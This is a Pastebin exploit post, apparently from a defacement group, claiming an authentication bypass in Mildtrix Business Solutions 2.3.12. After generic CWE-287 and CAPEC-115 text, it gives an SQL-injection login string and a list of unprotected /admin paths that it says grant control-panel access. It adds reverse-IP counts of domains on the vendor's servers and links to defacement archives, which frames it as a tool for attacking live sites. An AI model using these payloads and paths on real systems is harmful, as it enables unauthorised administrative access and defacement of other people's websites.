KingSkrupellos

Mildtrix Business Solutions Pvt Ltd 2.3.12 Improper Auth

May 28th, 2020
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.64 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Mildtrix Business Solutions Pvt Ltd 2.3.12 Improper Authentication
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 29 May 2020
  7. # Vendor Homepage : mildtrix.com
  8. facebook.com/mildtrix1/
  9. in.linkedin.com/company/mildtrix
  10. # Software Version : 2.3.12
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Vulnerability Type : CWE-287 [ Improper Authentication ]
  15. CAPEC-115: Authentication Bypass
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
  19. # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
  20. zone-h.org/archive/notifier=CyBeRiZM
  21. # Mirror-H : mirror-h.org/search/hacker/948/
  22. mirror-h.org/search/hacker/94/
  23. mirror-h.org/search/hacker/1826/
  24. # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
  25. defacer.id/archive/team/Cyberizm-Org
  26. # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
  27. # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
  28. aljyyosh.org/hacker.php?id=Cyberizm.Org
  29. aljyyosh.org/hacker.php?id=Cyberizm
  30. # Zone-D : zone-d.org/attacker/id/69
  31. # Pastebin : pastebin.com/u/KingSkrupellos
  32. # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
  33.  
  34. ####################################################################
  35.  
  36. # Impact :
  37. ***********
  38. CWE-287 [ Improper Authentication ]
  39. ************************************
  40. Authentication is any process by which a system verifies the identity of a user who wishes
  41. to access it.When an actor claims to have a given identity, the software does not
  42. prove or insufficiently proves that the claim is correct. Improper authentication
  43. occurs when an application improperly verifies the identity of a user.
  44. A software incorrectly validates user's login information and as a result, an attacker can
  45. gain certain privileges within the application or disclose sensitive information that allows
  46. them to access sensitive data and provoke arbitrary code execution.
  47. The weakness is introduced during Architecture and Design, Implementation stages.
  48.  
  49. CAPEC-115 [ Authentication Bypass ]
  50. *************************************
  51. An attacker gains access to application, service, or device with the privileges
  52. of an authorized or privileged user by evading or circumventing an authentication mechanism.
  53. The attacker is therefore able to access protected data without authentication ever having taken place.
  54. This refers to an attacker gaining access equivalent to an authenticated user without ever going
  55. through an authentication procedure. This is usually the result of the attacker using an unexpected
  56. access procedure that does not go through the proper checkpoints where authentication should occur.
  57. For example, a web site might assume that all users will click through a given link in order to get to
  58. secure material and simply authenticate everyone that clicks the link. However, an attacker might be
  59. able to reach secured web content by explicitly entering the path to the content rather than clicking
  60. through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
  61. other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
  62. faking authentication by exploiting flaws or by stealing credentials from legitimate users.
  63.  
  64. ####################################################################
  65.  
  66. # Authentication Bypass / Improper Authentication / Admin Panel Login Bypass Exploit :
  67. ******************************************************************************
  68. If we try to Authentication Bypass - it says : Your are not an Authentic User on /login.php
  69.  
  70. '=''or'
  71. '=''or'
  72.  
  73. Administrator Control Panel is not protected with any admin username and password.
  74.  
  75. But if you write /admin or /admin/latest_new.php on the URL => You are in Admin Control Panel.
  76.  
  77. Congratulations :)
  78.  
  79. /admin/photodash.php
  80. /admin/infodash.php
  81. /admin/acaddash.php
  82. /admin/admdash.php
  83. /admin/latest_new.php
  84. /admin/circulardash.php
  85.  
  86. ScreenShot Administrator Control Panel =>
  87.  
  88. https://www.upload.ee/image/11783244/mildrixbusinesssolutionsexploit2852020.png
  89.  
  90. Reverse IP results for mildtrix.com (166.62.6.38)
  91. There are 1,345 domains hosted on this server.
  92.  
  93. Reverse IP results for (103.20.212.17)
  94. There are 13 domains hosted on this server.
  95.  
  96. ####################################################################
  97.  
  98. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  99.  
  100. ####################################################################
Add Comment
Please, Sign In to add comment